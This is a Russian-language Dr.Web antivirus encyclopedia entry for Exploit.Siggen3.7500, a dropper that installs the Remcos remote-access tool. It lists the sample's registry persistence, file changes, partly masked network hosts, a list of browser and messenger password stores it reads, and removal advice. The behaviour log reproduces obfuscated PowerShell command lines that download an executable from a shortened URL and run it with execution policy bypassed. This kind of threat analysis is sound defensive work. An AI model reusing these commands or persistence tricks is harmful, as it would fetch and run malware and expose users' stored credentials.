Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Exploit.Siggen3.7500

Добавлен в вирусную базу Dr.Web: 2021-01-07

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe,%HOMEPATH%\rthfy.exe,'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run\] 'Remcos' = '"%APPDATA%\Remcos\remcos.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
  • '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y4cpohnr','nm.exe')
  • '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item "nm.exe" -Destination "${enV`:appdata}"
  • '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:appdata};.('.'+'/nm.exe')
Внедряет код в
следующие пользовательские процессы:
  • remcos.exe
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
  • [<HKCU>\Identities\{91255D00-95D9-49F5-8E84-7C027F5283B7}\Software\Microsoft\Internet Account Manager\Accounts]
  • [<HKCU>\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
  • [<HKCU>\Software\Microsoft\Internet Account Manager\Accounts]
  • [<HKCU>\Software\Paltalk]
  • [<HKCU>\Software\Google\Google Talk\Accounts]
  • [<HKCU>\Software\Mirabilis\ICQ\NewOwners]
  • [<HKCU>\Identities\{91255D00-95D9-49F5-8E84-7C027F5283B7}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
  • [<HKLM>\Software\Wow6432Node\Mirabilis\ICQ\NewOwners]
  • [<HKCU>\Software\AIM\AIMPRO]
  • [<HKCU>\Software\America Online\AIM6\Passwords]
  • [<HKCU>\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users]
  • [<HKCU>\Software\Microsoft\IdentityCRL]
  • [<HKCU>\Software\Microsoft\MSNMessenger]
  • [<HKLM>\Software\Wow6432Node\Miranda]
  • [<HKCU>\Software\Yahoo\Pager]
  • [<HKCU>\Software\Microsoft\Windows Live Mail]
Читает файлы, отвечающие за хранение паролей сторонними программами
  • %APPDATA%\mozilla\firefox\profiles.ini
  • %LOCALAPPDATA%\google\chrome\user data\default\web data
  • %LOCALAPPDATA%\google\chrome\user data\default\login data
  • %APPDATA%\opera software\opera stable\login data
Изменения в файловой системе
Создает следующие файлы
  • %HOMEPATH%\documents\nm.exe
  • %TEMP%\addinprocess32.exe
  • %HOMEPATH%\rthfy.exe
  • %TEMP%\fb_22eb.tmp.exe
  • %TEMP%\fb_2414.tmp.exe
  • %APPDATA%\remcos\remcos.exe
  • %TEMP%\install.vbs
  • %APPDATA%\remcos\logs.dat
  • %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
  • %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
  • %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
  • %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
  • %TEMP%\ndksszgwyefstfukfoawteghlt
  • %TEMP%\ebhtlp
Удаляет следующие файлы
  • %TEMP%\install.vbs
  • %TEMP%\ndksszgwyefstfukfoawteghlt
  • %TEMP%\ebhtlp
Перемещает следующие файлы
  • %HOMEPATH%\documents\nm.exe в %APPDATA%\nm.exe
Сетевая активность
TCP
Запросы HTTP GET
  • http://am###anat.com/wp-content/plugins/tech/LO-06.exe
  • 'ti##url.com':443
  • 'wh##########tdodoestnotexist.duckdns.org':2889
  • UDP
    • DNS ASK ti##url.com
    • DNS ASK am###anat.com
    • DNS ASK wh##########tdodoestnotexist.duckdns.org
    Другое
    Создает и запускает на исполнение
    • '%WINDIR%\syswow64\wscript.exe' "%TEMP%\install.vbs"
    • '%APPDATA%\remcos\remcos.exe' /stext "%TEMP%\ovmmmhipbn"
    • '%APPDATA%\remcos\remcos.exe' /stext "%TEMP%\ebhtlp"
    • '%APPDATA%\remcos\remcos.exe' /stext "%TEMP%\azcdlcbsaupkgafsgkzrhwnhuguvdqfmc"
    • '%APPDATA%\remcos\remcos.exe' /stext "%TEMP%\pfpktjrqmmxxwmjopznyertymakmk"
    • '%APPDATA%\remcos\remcos.exe'
    • '%APPDATA%\remcos\remcos.exe' /stext "%TEMP%\ndksszgwyefstfukfoawteghlt"
    • '%APPDATA%\remcos\remcos.exe' /stext "%TEMP%\zyrenabixvpbg"
    • '%TEMP%\addinprocess32.exe'
    • '%HOMEPATH%\rthfy.exe'
    • '%APPDATA%\nm.exe'
    • '%TEMP%\fb_2414.tmp.exe'
    • '%TEMP%\fb_22eb.tmp.exe'
    • '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:appdata};.('.'+'/nm.exe')' (со скрытым окном)
    • '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item "nm.exe" -Destination "${enV`:appdata}"' (со скрытым окном)
    • '%WINDIR%\syswow64\wscript.exe' "%TEMP%\install.vbs"' (со скрытым окном)
    • '%WINDIR%\syswow64\cmd.exe' /c "%APPDATA%\Remcos\remcos.exe"' (со скрытым окном)
    • '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y4cpohnr','nm.exe')' (со скрытым окном)
    Запускает на исполнение
    • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y4cpohnr','nm.exe')
    • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item "nm.exe" -Destination "${enV`:appdata}"
    • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:appdata};.('.'+'/nm.exe')
    • '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,%HOMEPATH%\rthfy.exe,"
    • '%WINDIR%\syswow64\reg.exe' ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,%HOMEPATH%\rthfy.exe,"
    • '%WINDIR%\syswow64\cmd.exe' /c "%APPDATA%\Remcos\remcos.exe"

    Рекомендации по лечению

    1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
    2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
    Скачать Dr.Web

    По серийному номеру

    Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

    На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

    Скачать Dr.Web

    По серийному номеру

    1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
    2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
      • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
      • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
      • выключите устройство и включите его в обычном режиме.

    Подробнее о Dr.Web для Android

    Демо бесплатно на 14 дней

    Выдаётся при установке